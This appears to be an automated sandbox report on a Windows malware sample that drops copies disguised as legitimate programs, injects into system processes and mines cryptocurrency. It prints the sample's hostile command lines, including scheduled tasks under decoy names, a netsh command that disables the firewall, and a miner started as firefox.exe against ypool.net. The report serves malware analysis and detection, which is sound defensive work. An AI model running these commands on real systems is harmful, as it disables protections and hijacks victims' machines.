File created | C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\sttray64.exe | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\MSIPC\sv\iTunesHelper.exe | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-1000-0000000FF1CE}\~njxvzlc.tmp | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Config\~qzkwnlh.tmp | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A
File created | C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\sttray64.exe | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\~qzbmlki.tmp | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\ro-RO\~whfmqsm.tmp | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Car\LTR\contrast-black\~egjjrza.tmp | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Car\LTR\contrast-black\~suhwevh.tmp | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A
File opened for modification | C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\sttray64.exe | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A
File created | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\EQUATION\amclient.exe | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.YourPhone_2019.430.2026.0_neutral_~_8wekyb3d8bbwe\microsoft.system.package.metadata\~pxycziy.tmp | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\~qzbmlki.tmp | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\ro-RO\~whfmqsm.tmp | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A
File created | C:\Program Files\Microsoft Office\root\Office16\MSIPC\sv\iTunesHelper.exe | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-1000-0000000FF1CE}\~njxvzlc.tmp | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\EQUATION\amclient.exe | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Config\~qzkwnlh.tmp | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\EQUATION\amclient.exe | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\MSIPC\sv\~lggycpe.tmp | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\Images\PlaceCard\contrast-white\~lnugsvv.tmp | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\EQUATION\~awbhnex.tmp | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Place\~cinivab.tmp | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\EQUATION\~awbhnex.tmp | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A
File created | C:\Program Files\Microsoft Office\root\Office16\MSIPC\sv\iTunesHelper.exe | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-1000-0000000FF1CE}\DTLite.exe | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\~bvvdmbp.tmp | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A
File opened for modification | C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\~gknjcsz.tmp | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\c7e62994e4d9cbb42f7c6aad4fc9d2cf4bcf71bb55617e2b85c2cc572a48b225.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\c7e62994e4d9cbb42f7c6aad4fc9d2cf4bcf71bb55617e2b85c2cc572a48b225.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\c7e62994e4d9cbb42f7c6aad4fc9d2cf4bcf71bb55617e2b85c2cc572a48b225.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\c7e62994e4d9cbb42f7c6aad4fc9d2cf4bcf71bb55617e2b85c2cc572a48b225.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3548 wrote to memory of 4144 N/A C:\Users\Admin\AppData\Local\Temp\c7e62994e4d9cbb42f7c6aad4fc9d2cf4bcf71bb55617e2b85c2cc572a48b225.exe C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe
PID 3548 wrote to memory of 4144 N/A C:\Users\Admin\AppData\Local\Temp\c7e62994e4d9cbb42f7c6aad4fc9d2cf4bcf71bb55617e2b85c2cc572a48b225.exe C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe
PID 4144 wrote to memory of 404 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Windows\system32\cmd.exe
PID 4144 wrote to memory of 404 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Windows\system32\cmd.exe
PID 4144 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Windows\system32\cmd.exe
PID 4144 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Windows\system32\cmd.exe
PID 4144 wrote to memory of 3940 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Windows\system32\cmd.exe
PID 4144 wrote to memory of 3940 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Windows\system32\cmd.exe
PID 4144 wrote to memory of 3784 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Windows\System32\schtasks.exe
PID 4144 wrote to memory of 3784 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Windows\System32\schtasks.exe
PID 4144 wrote to memory of 3592 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Windows\System32\schtasks.exe
PID 4144 wrote to memory of 3592 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Windows\System32\schtasks.exe
PID 4144 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Windows\System32\schtasks.exe
PID 4144 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Windows\System32\schtasks.exe
PID 4144 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Windows\System32\schtasks.exe
PID 4144 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Windows\System32\schtasks.exe
PID 4144 wrote to memory of 3484 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Windows\System32\schtasks.exe
PID 4144 wrote to memory of 3484 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Windows\System32\schtasks.exe
PID 4144 wrote to memory of 1000 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe
PID 4144 wrote to memory of 1000 N/A C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe
PID 1000 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe C:\Windows\System32\netsh.exe
PID 1000 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe C:\Windows\System32\netsh.exe
PID 1000 wrote to memory of 3320 N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe C:\Windows\system32\cmd.exe
PID 1000 wrote to memory of 3320 N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe C:\Windows\system32\cmd.exe
PID 1000 wrote to memory of 4436 N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe C:\Windows\system32\cmd.exe
PID 1000 wrote to memory of 4436 N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe C:\Windows\system32\cmd.exe
PID 1000 wrote to memory of 1208 N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe C:\Windows\system32\cmd.exe
PID 1000 wrote to memory of 1208 N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe C:\Windows\system32\cmd.exe
PID 1000 wrote to memory of 4980 N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe C:\Windows\System32\schtasks.exe
PID 1000 wrote to memory of 4980 N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe C:\Windows\System32\schtasks.exe
PID 1000 wrote to memory of 616 N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe C:\Windows\System32\schtasks.exe
PID 1000 wrote to memory of 616 N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe C:\Windows\System32\schtasks.exe
PID 1000 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe C:\Windows\System32\schtasks.exe
PID 1000 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe C:\Windows\System32\schtasks.exe
PID 1000 wrote to memory of 4852 N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe C:\Windows\System32\schtasks.exe
PID 1000 wrote to memory of 4852 N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe C:\Windows\System32\schtasks.exe
PID 1000 wrote to memory of 4256 N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe C:\Windows\System32\schtasks.exe
PID 1000 wrote to memory of 4256 N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe C:\Windows\System32\schtasks.exe
PID 1000 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1000 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1000 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1000 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1000 wrote to memory of 4848 N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1000 wrote to memory of 4848 N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1000 wrote to memory of 4848 N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1000 wrote to memory of 4848 N/A C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe C:\Program Files\Mozilla Firefox\firefox.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\c7e62994e4d9cbb42f7c6aad4fc9d2cf4bcf71bb55617e2b85c2cc572a48b225.exe

"C:\Users\Admin\AppData\Local\Temp\c7e62994e4d9cbb42f7c6aad4fc9d2cf4bcf71bb55617e2b85c2cc572a48b225.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4100,i,13544508926340531097,6671217806016090640,262144 --variations-seed-version --mojo-platform-channel-handle=4020 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe

"C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /C DIR /A:D /S /B *

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /C DIR /A:D /S /B *

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /C DIR /A:D /S /B *

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /CREATE /F /SC MINUTE /MO 34 /TN "ComAgent" /TR "\"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\ComAgent.exe\""

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /CREATE /F /SC MINUTE /MO 15 /TN "DAEMON Tools Lite" /TR "\"C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-1000-0000000FF1CE}\DTLite.exe\""

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /CREATE /F /SC MINUTE /MO 20 /TN "IDT PC Audio" /TR "\"C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\sttray64.exe\""

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /CREATE /F /SC MINUTE /MO 29 /TN "IntelAPMClient" /TR "\"C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\EQUATION\amclient.exe\""

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /CREATE /F /SC ONLOGON /TN "AutoUpdate Monitor" /TR "\"C:\Users\Admin\Documents\My Pictures\almon.exe\""

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe

C:\Windows\System32\netsh.exe

"C:\Windows\System32\netsh.exe" firewall set opmode mode=DISABLE

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /C DIR /A:D /S /B *

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /C DIR /A:D /S /B *

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /C DIR /A:D /S /B *

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /CREATE /F /SC MINUTE /MO 34 /TN "ComAgent" /TR "\"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\ComAgent.exe\""

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /CREATE /F /SC MINUTE /MO 15 /TN "DAEMON Tools Lite" /TR "\"C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-1000-0000000FF1CE}\DTLite.exe\""

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /CREATE /F /SC MINUTE /MO 20 /TN "IDT PC Audio" /TR "\"C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\sttray64.exe\""

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /CREATE /F /SC MINUTE /MO 29 /TN "IntelAPMClient" /TR "\"C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\EQUATION\amclient.exe\""

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /CREATE /F /SC ONLOGON /TN "AutoUpdate Monitor" /TR "\"C:\Users\Admin\Documents\My Pictures\almon.exe\""

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -o ypool.net -u node.bot4 -p x -t 2 -m512

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -o ypool.net -u node.bot4 -p x -t 2 -m512

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 ypool.net udp

Files

memory/3548-0-0x0000000003270000-0x0000000003271000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe

memory/4144-17-0x0000000004B10000-0x0000000004B11000-memory.dmp

C:\Users\Admin\Pictures\~rtilhxt.tmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\plugin-container.exe

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\ComAgent.exe

C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-1000-0000000FF1CE}\DTLite.exe

C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\sttray64.exe

C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\EQUATION\amclient.exe

C:\Users\Admin\Documents\My Pictures\almon.exe

C:\Program Files\Microsoft Office\root\Office16\MSIPC\sv\iTunesHelper.exe

memory/2488-553-0x000001EC96C60000-0x000001EC96C89000-memory.dmp

memory/4848-554-0x000002C5996D0000-0x000002C5996F9000-memory.dmp